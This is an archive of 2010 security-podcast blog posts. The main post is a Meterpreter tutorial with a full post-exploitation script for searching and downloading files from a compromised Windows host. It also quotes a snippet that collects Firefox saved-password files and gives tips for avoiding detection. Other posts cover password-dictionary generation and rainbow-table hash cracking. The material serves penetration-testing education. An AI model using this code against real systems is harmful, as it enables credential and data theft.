In part 1 of this episode we have "The Dan Kaminskies"!
Hosts: Paul "PaulDotCom" Asadoorian,John Strand,Larry Pesce,Carlos Perez
Audio Feeds: 
August 2010 Archives
Yesterday Stephen Fewer committed to the development version of Metasploit code for the Windows Version of Meterpreter for searching thru the file system and using the index service of the modern versions of Windows. The advantage of having this capability as part of the standard API is that it gets executed at the host and only matched entries are returned, before this mode all entries where returned and they had to be evaluated on the attackers machine and depending on the type of connection, the distance and path to the target this is a very slow process and generates a lot of traffic that can give away the actions being taken.
Here is an example of a search using the method described before from the enum_firefox script
def frfxpswd(path,usrnm)@client.fs.dir.foreach(path) {|x|next if x =~ /^(\.|\.\.)$/fullpath = path + '\\' + xif @client.fs.file.stat(fullpath).directory?frfxpswd(fullpath,usrnm)elsif fullpath =~ /(cert8.db|signons.sqlite|signons3.txt|key3.db)/ibegindst = xdst = @logs + ::File::Separator + usrnm + dstprint_status("\tDownloading Firefox Password file to '#{dst}'")@client.fs.file.download_file(dst, fullpath)rescueprint_error("\t******Failed to download file #{x}******")print_error("\t******Browser could be running******")endend}end
As it can be seen on the first 6 lines of the code we have to use client.fs.dir.foreach and parse each entry and check that it is not the . and .. entries that are returned, then they are checked with client.fs.file.start(path).directory? to see if path is a Directory or a file, if it is a file we return it back to the function it self to search that directory, when a file is found its name is checked to se if it the file we are looking for and if it is we take the actions we want. This is very slow when we are dealing with a recursive search. Now if we want to search for files that match a specific pattern we can use client.fs.file.search(path,pattern,recursive) as you can see we pass to this call the path from where to start the search, if we provide as path nil it will search all drives, then we pass the pattern to search and last if we want the search to be recursive or not. This will return an array of hashes of what was found:
>> client.fs.file.search("c:\\","*.sys",false)=> [{"name"=>"hiberfil.sys", "size"=>2139795456, "path"=>"c:"}, {"name"=>"pagefile.sys", "size"=>4284719104, "path"=>"c:"}]
As it can be seen the elements of the hash are name, path and size in bytes, if no file is found the length of the array will be 0 if a wrong path is provided an operation error 3 will be raised
>> client.fs.file.search("x:\\","*.sys",false)Rex::Post::Meterpreter::RequestError: stdapi_fs_search: Operation failed: 3
One advantage provided by this call also is that on recent versions of windows like on Vista, 7 and 2008 it will use the index service and will give us the ability to search the Internet Explorer history and MAPI (email) entries. Just by specifying as the path for the search iehistory for Internet Explorer history and mapi for searching email entries. The entries found will be presented in the name element of hash. One important note is that when searching thru the MAPI and Internet Explorer entries recursive type search must be used. Now if we want to use this from inside Meterpreter we just use the search command:
meterpreter > search -hUsage: search [-d dir] [-r recurse] -f patternSearch for files.OPTIONS:-d <opt> The directory/drive to begin searching from. Leave empty to search all drives. (Default: )-f <opt> The file pattern glob to search for. (e.g. *secret*.doc?)-h Help Banner.-r <opt> Recursivly search sub directories. (Default: true)
The options are simple with the –d option we specify the path if none is given it will search all drives on the target machine. With the –f option we provide the search glob that will be user to match what file information will be returned to the attackers machine, the –r option with a given value of true or false to specify if the search will be recursive or not.
meterpreter > search -d c:\\ -f *.sys -r falseFound 2 results...c:\hiberfil.sys (2139795456 bytes)c:\pagefile.sys (4284719104 bytes)meterpreter >
Now lets create a small script to aid us in a pentest to find, select and download files from a target system.
Lets start by defining what we want the script to do:
· We got to be able to search for different things at once.
· We have to save the results to a file we can edit.
· We have to use the modified file to download those files we want.
· We have to provide a start directory for the search.
· We have to be able to control if the search will be recursive or not.
So lets start by declaring our variables and setting what the options of the script will be:
@client = clientlocation = nilsearch_blob = nilinput_file = niloutput_file = nilrecurse = falselogs = nil@opts = Rex::Parser::Arguments.new("-h" => [false, "Help menu." ],"-i" => [true, "Input file with list of files to download, one per line."],"-d" => [true, "Directory to start search on, search will be recursive."],"-f" => [true, "Search blobs separated by a |."],"-o" => [true, "Output File to save the full path of files found."],"-r" => [false, "Search subdirectories."],"-l" => [true, "Location where to save the files."])
These variables will hold the values of the options:
· Location to hold the path of where the search will start.
· Search_blob to hold our seach blobs.
· Input_file to hold the file that we will feed the script for download.
· Output_file to hold the name and location of the file we will write the results to.
· Recurse will be a Boolean value to determine if the search will be recursive or not.
· Logs to specify where the downloaded files will be saved to.
We add the customary usage function:
# Function for displaying help messagedef usageprint_line "Meterpreter Script for searching and downloading files that"print_line "match a specific pattern."print_line(@opts.usage)raise Rex::Script::Completedend
Next we check the version of Meterpreter to make sure we run on the Windows version and not the Java or PHP version that do not contain the search API call since it is not implemented on this versions.
# Check that we are running under the right type of Meterpreter, if not show and error mesage and make sure we have arguments if not show the usage of the script.if client.platform =~ /win32|win64/if args.length > 0…………elseusageendelseprint_error["This script is not supported on this version of Meterpreter."]end
Once we have all of our checks in place we will parse the options and populate our variables with the information that we need to get our tasks done.
@opts.parse(args) { |opt, idx, val|case optwhen "-h"usagewhen "-i"input_file = valwhen "-o"output_file = valwhen "-d"location = valwhen "-f"search_blob = val.split("|")when "-r"recurse = truewhen "-l"logs = valend}
You will see that for the –f option we are splitting the values given and returns an array with each element containing each of the search strings we want to search for. Now that we have populated the variables with the values of the options we passes to the script we can know perform the task for what we wrote the script for. First thing we will do is perform our search making sure we provided a source directory and we make sure our search blob array contains values.
# Search for files and save their location if specifiedif search_blob.length > 0 and locationsearch_blob.each do |s|print_status("Searching for #{s}")results = @client.fs.file.search(location,s,recurse)results.each do |file|print_status("\t#{file['path']}\\#{file['name']} (#{file['size']} bytes)")file_local_write(output_file,"#{file['path']}\\#{file['name']}") if output_fileendendend
As you can see we will only write the results to a file if we provided an output file, by using the file_local_write Meterpreter mixin we make sure that if the file does not exist it will be created for us and save us from writing a function for writing what we want to a file. Now we will add the code for reading our file after we edited it and decided which ones we want to download.
# Read log file and download those files foundif input_file and logsif ::File.exists?(input_file)print_status("Reading file #{input_file}")::File.open(input_file, "r").each_line do |line|print_status("Downloading #{line.chomp}")@client.fs.file.download(logs, line.chomp)endelseprint_error("File #{input_file} does not exist!")endend
The script would be used to search for specific files, now one thing to consider when doing the searching is that searching all disk will cause I/O activity on the system that is bound to be detected if:
1. There is monitoring software in the case of servers.
2. A user is currently using the target machine.
So it is very important to check the idle time of the user on the box, check processes and installed software on that box to make sure your action will not be detected if you run the search thru out the system. A target search of the users profile is a better approach in the case of desktop system since Windows and applications tends to save most data in those folders, using the get_env script can aid in identifying the location of this folders since it will show user and system environment variables. Also do check the size of the files before downloading, you would not have much success trying to download a 2GB PST thru a 300kb connection. I do hope you found this blog post useful and informative.
Full script:
@client = clientlocation = nilsearch_blob = nilinput_file = niloutput_file = nilrecurse = falselogs = nil@opts = Rex::Parser::Arguments.new("-h" => [false, "Help menu." ],"-i" => [true, "Input file with list of files to download, one per line."],"-d" => [true, "Directory to start search on, search will be recursive."],"-f" => [true, "Search blobs separated by a |."],"-o" => [true, "Output File to save the full path of files found."],"-r" => [false, "Search subdirectories."],"-l" => [true, "Location where to save the files."])# Function for displaying help messagedef usageprint_line "Meterpreter Script for searching and downloading files that"print_line "match a specific pattern."print_line(@opts.usage)raise Rex::Script::Completedend# Check that we are running under the right type of Meterpreterif client.platform =~ /win32|win64/# Parse the optionsif args.length > 0@opts.parse(args) { |opt, idx, val|case optwhen "-h"usagewhen "-i"input_file = valwhen "-o"output_file = valwhen "-d"location = valwhen "-f"search_blob = val.split("|")when "-r"recurse = truewhen "-l"logs = valend}# Search for files and save their location if specifiedif search_blob.length > 0 and locationsearch_blob.each do |s|print_status("Searching for #{s}")results = @client.fs.file.search(location,s,recurse)results.each do |file|print_status("\t#{file['path']}\\#{file['name']} (#{file['size']} bytes)")file_local_write(output_file,"#{file['path']}\\#{file['name']}") if output_fileendendend# Read log file and download those files foundif input_file and logsif ::File.exists?(input_file)print_status("Reading file #{input_file}")::File.open(input_file, "r").each_line do |line|print_status("Downloading #{line.chomp}")@client.fs.file.download(logs, line.chomp)endelseprint_error("File #{input_file} does not exist!")endendelseusageendelseprint_error["This script is not supported on this version of Meterpreter."]end
Alright, so maybe Dan needs some other folks to help, and maybe they're not capable of resetting the internet per se, but regardless, we have Dan Kaminsky live on Episode 208 of PaulDotCom Security Weekly, at 7:30 PM EDT tomorrow night!
Carlos Perez will speak about his latest Ruby script for launching Karmetasploit type attacks in Backtrack!
Join the IRC channel during the stream - we can take live comments and discussion from the channel! Find us on IRC at irc.freenode.net #pauldotcom (You will be required to register in order to chat in the channel, this is an anti-spam measure).
When active, the live stream(s) can be found at:
PaulDotCom Live! - You can watch the live video, listen, and chat during each episode! You can access the streaming videos at any time by visiting http://pauldotcom.com/live/
PaulDotCom Icecast Radio (Audio Only)
Break out your adult beverage of choice and join us, enjoy the show live, and thanks for listening!
- Paul "Salad Shooter" Asadoorian, Larry "HaxorTheMatrix" Pesce, Carlos "Dark 0perator" Perez, Darren "The Other Guy" Wigley, and John "The Father" Strand.
Hosts: Paul "PaulDotCom" Asadoorian,John Strand,Larry Pesce,Carlos Perez
Audio Feeds:
Hosts: Paul "PaulDotCom" Asadoorian,John Strand,Larry Pesce,Carlos Perez
Audio Feeds:
Despite our audio failures we were able to rescue the Barnaby Jack interview. Blame the intern they are expendable and easily replaceable. So please download this fine interview with Mr. Jack as he discusses his imbedded systems work, and some thing about ATM machines that he spent some time on.
Hosts: Paul "PaulDotCom" Asadoorian,John Strand,Larry Pesce,Carlos Perez
Audio Feeds:
We have a special treat for Episode 207 of PaulDotCom Security Weekly! We'll have cellphone (in)security expert Chris Paget on to discuss his recent Defcon experiment on GSM cracking, as well as Ron "Facebook Hacker" Bowes providing a guest tech segment on cracking passwords. Both guests will be bringing the failboat to their respective targets at 7:30 PM EDT live tomorrow evening.
Join the IRC channel during the stream - we can take live comments and discussion from the channel! Find us on IRC at irc.freenode.net #pauldotcom (You will be required to register in order to chat in the channel, this is an anti-spam measure).
When active, the live stream(s) can be found at:
PaulDotCom Live! - You can watch the live video, listen, and chat during each episode! You can access the streaming videos at any time by visiting http://pauldotcom.com/live/
PaulDotCom Icecast Radio (Audio Only)
Break out your adult beverage of choice and join us, enjoy the show live, and thanks for listening!
- Paul "Salad Shooter" Asadoorian, Larry "HaxorTheMatrix" Pesce, Carlos "Dark 0perator" Perez, Darren "The Other Guy" Wigley, John "The Father" Strand, and Mark "Quiet but Deadly" Baggett.
Dennis Brown tell us how he used the newly released Kismet for the QuahogCon Badge to spoof parts of the DefCon 18 Ninja Networks party badge. The hosts also discuss stories for this week. The intern makes lame excuses for his DefCon 18 party habits.
Hosts: Paul "PaulDotCom" Asadoorian,John Strand,Larry Pesce,Carlos Perez
Audio Feeds:
Back in Episode 170 Larry talked about talked about Reconnoiter. Reconnoiter was written by Jason Wood and it builds username list based upon linkedin.com profiles. After using the script on a recent penetration test I thought it would be nice if I also had a custom dictionary like those created by CeWL for each user at the company. So I wrote a script to create them and decided to share it with our listeners.
The intended use of userpass.py is to generate a customized password dictionary for every employee at a target company. You give it the name of your target company and it will give you a separate password file for each user at the company. In the demoes I target individuals rather than companies, but you get the idea.
We cover userpass.py on episode 206. So download it and give it a go. If you want to try it out, but you down have CeWL installed yet just add '-p "echo" ' to the end of your options.
Custom Per user password dictionaries from PaulDotCom on Vimeo.
Here is Jason Wood's script
Here is CeWL by Digininja
Join me in San Antonio for SANS 504 Hacker Techniques and Incident Response November 13-20th. Register Today
Come join the discussion with Barnaby Jack for Episode 206 of PaulDotCom Security Weekly, at 7:30 PM EDT live Thursday evening. Barnaby will be discussing one of the hottest demos at the recent Black Hat security conference where he demonstrated ATM "jackpotting".
"So Paul, what do you say to having Barnaby give you a hand with your ATM transactions from now on?"
Mark Baggett will also be discussing a new tool that he wrote, similar to CeWL, Mark's code will generate a custom password dictionary for a specified user using Social Networking sites!
Join the IRC channel during the stream - we can take live comments and discussion from the channel! Find us on IRC at irc.freenode.net #pauldotcom (You will be required to register in order to chat in the channel, this is an anti-spam measure).
When active, the live stream(s) can be found at:
PaulDotCom Live! - You can watch the live video, listen, and chat during each episode! You can access the streaming videos at any time by visiting http://pauldotcom.com/live/
PaulDotCom Icecast Radio (Audio Only)
Break out your adult beverage of choice and join us, enjoy the show live, and thanks for listening!
- Paul "Salad Shooter" Asadoorian, Larry "HaxorTheMatrix" Pesce, Carlos "Dark 0perator" Perez, Darren "The Other Guy" Wigley, John "The Father" Strand, and Mark "Quiet but Deadly" Baggett.
This is a very different episode of our podcast. I wanted to take a moment to tell all of our listeners about a recent tragedy. Last Friday night Matthew Shoemaker, co-founder of the Infosec daily podcast, passed away. Mathew left behind a wife and two children and will be missed greatly. I appeared on an episode of the ISD podcast, and had a fantastic time talking to Rick and Matt. In fact, Rick and Matt were scheduled to be on tonight's show. Instead, I'l like to take a moment to tell all of our listeners how they can donate to support Matt's family. Simply go to http://pauldotcom.com/shoemaker. This will re-direct you to a site where you can use Paypal to make a donation to Matt's family. While I didn't know Matt all that well, it was a great time when I appeared on his show and I know many are grieving his loss.
Matthew Shoemaker 1973 – 2010
From all of us at Pauldotcom we extend our deepest symapthies.
Our sincerest condolences go out to the friends and family of Mathew Shoemaker of the Infosec Daily Podcast. He will be missed for sure. We will dedicate a special episode to Matthew later this week.
Paul and John shoot the breeze on a lazy summer night and talk about Linux honeyports, vulnerability scanning vs. penetration testing, IPv6 host discovery, and attacking consumer devices.
* Sorry for the audio lag and weirdness it will be better once the new studio is complete!
Plane ticket to Las Vegas: $500. Admission ticket to Defcon $140. Hotel room: $99/night. Admission to exclusive Ninja Networks party: $0. Passing out at party, getting your face written on, and having your picture taken with darktangent and others: Priceless.
Hosts: Paul "PaulDotCom" Asadoorian,John Strand
Audio Feeds:
Last ShmooCon something wicked and evil happened. The fine folks on the PDC mailing list decided it would be a great idea to have a place at Shmoo where we could all meet up and share Rainbow Tables. What a grand idea! After all, good Rainbow Tables can easily go well into the hundreds of gigabits so why not have a nice get together and share?
Small problem. Everyone showed up with empty hard drives. No one, not a single person, brought any tables at all.
Zip.
Add to this the fact that my external hard drive with my Rainbow Tables crashed out on me last week. So, we now have two important lessons to take from the Rainbow Tables saga. Lesson one: no one is willing to share. Lesson two: backups are kind of important.
To remedy this situation I went to the fine people at Project Rainbow Crack and ordered a new set of tables for NT and LANMAN hashes. You may say that simply downloading them would be cheaper, and you would be right. However, we were in a bind on a current pen test and needed them immediately. Turns out it would be much faster to order them and have them shipped to us rather than download them.
I went to the section the Project Rainbowtable site to buy the tables and ordered the USD $300 set. What I would get is a new 320 GB hard drive and the 272 GB of tables for LM and NT hashes to go with it. What I was not expecting was that overnight air was included in the cost.
These guys simply rock. The service was excellent, and their packing… well their packing was something to be seen to be belived.
As near as I could tell it was wrapped in bubble wrap, 4 years of newspaper compressed to 1" around the entire drive and the strongest tape known to man wrapped liberally around the drive.
First, I needed the right tools.
Finally, I was able to squeeze the box out and see what was sent to me. It was an external hard drive. No Liquor to replenish my stock. It would have been better if there was alcohol in the package. For this reason, and this reason only, they get 4 out of 5 stars.
Everything was in its place. The tables, and the software to make them sing. I was a bit disappointed to see that only the programs for Windows were included. A bit of a bummer, but that is ok. There are plenty of places online to find Linux and OSX programs that work with the tables that were sent to me.
Oddly enough, the software was WinRAR protected with a password of "abcde12345". I am pretty sure this has something to do with crypto export controls. But it still made me chuckle.
How did they work? Beautifully. We were able to crack an Admin LANMAN password hash in under 5 min, and a NT only hash in under 15min.
When you get the tables there will be a couple of things that you will notice. First, the tables are in .rtc format. This is no big deal, except other tools like Cain and Able will need the tables to be in .rt format. The fine folks at Project Rainbow Crack have a few excellent tools to covert the formats here.
I cannot recommend the product from the fine folks at Project Rainbow crack enough. The drive is ok and the service was prompt and the tables worked.
Also, I am currently backing up the tables to two different drives.
Next year I will be bringing some tables to share.
There are currently a number of great sites that offer free tables. Below are just a few:
http://www.freerainbowtables.com/
http://ophcrack.sourceforge.net/tables.php
Before you come to Shmoo get some tables and bring them to share with everyone else.
We will not have a repeat from last year.
-strandjs